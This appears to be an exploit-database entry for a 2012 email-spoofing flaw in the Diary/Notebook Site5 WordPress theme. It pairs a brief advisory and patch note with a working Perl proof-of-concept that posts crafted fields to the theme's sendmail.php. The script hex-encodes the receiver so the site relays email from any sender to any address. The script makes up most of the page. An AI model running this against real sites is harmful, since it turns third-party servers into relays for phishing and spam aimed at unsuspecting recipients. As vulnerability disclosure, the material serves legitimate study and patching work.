Diary/Notebook Site5 Wordpress Theme - Email Spoofing

vendor:

Diary/Notebook Site5 Wordpress Theme

by:

@bwallHatesTwits

7,5

CVSS

HIGH

Email Spoofing

CWE

Product Name: Diary/Notebook Site5 Wordpress Theme

Affected Version From: Not Documented

Affected Version To: Not Documented

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux 3.2

2012

Diary/Notebook Site5 WordPress Theme – Email Spoofing

A vulnerability exists in the Diary/Notebook Site5 Wordpress Theme which allows an attacker to send spoofed emails. This vulnerability is due to the lack of proper validation of the sender's email address in the sendmail.php script. An attacker can exploit this vulnerability by sending a crafted POST request to the sendmail.php script with a spoofed email address as the sender. This can be used to send malicious emails to unsuspecting users.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of the Diary/Notebook Site5 Wordpress Theme.

Source

Exploit-DB raw data:

#!/usr/bin/perl
# Exploit Title: Diary/Notebook Site5 Wordpress Theme - Email Spoofing
# Date: 15.07.2012
# Exploit Author: @bwallHatesTwits
# Discovered by: @xxDigiPxx (http://www.ticktockcomputers.com/wordpress/site5-wordpress-theme-diary-sendmail-php-spoofing/)
# Software Link: http://www.wpdiarytheme.com/
# Vendor Homepage: http://www.site5.com/
# Others Possibly Vulnerable: http://www.site5.com/wordpress-themes/
# Version: Not Documented
# Tested on: Linux 3.2 
use strict;
use warnings;

use LWP::UserAgent; 
use HTTP::Request::Common qw{ POST };

#Change this to the root of the Wordpress
my $wordpress = 'http://localhost/wordpress/';
my $url = $wordpress.'wp-content/themes/diary/sendmail.php';

#Name shows up in the topic of the email (Website contact message from name)
my $name ='Proof of Concept';

#Sender email address
my $email = 'sender@mail.com';

#Content of the email
my $comment = 'Email content';

#Receiver email address
my $receiver = 'receiver@mail.com';
$receiver =~ s/(.)/sprintf("%x",ord($1))/eg;

my $ua = LWP::UserAgent->new();
my $request = POST( $url, [ name => $name, email => $email, comment => $comment, receiver => $receiver, submit => 'submit', ] );
print "Sending request to $url\n";
my $content = $ua->request($request)->as_string();
print $content;
print "\nDone\nFollow \@BallastSec on Twitter\n";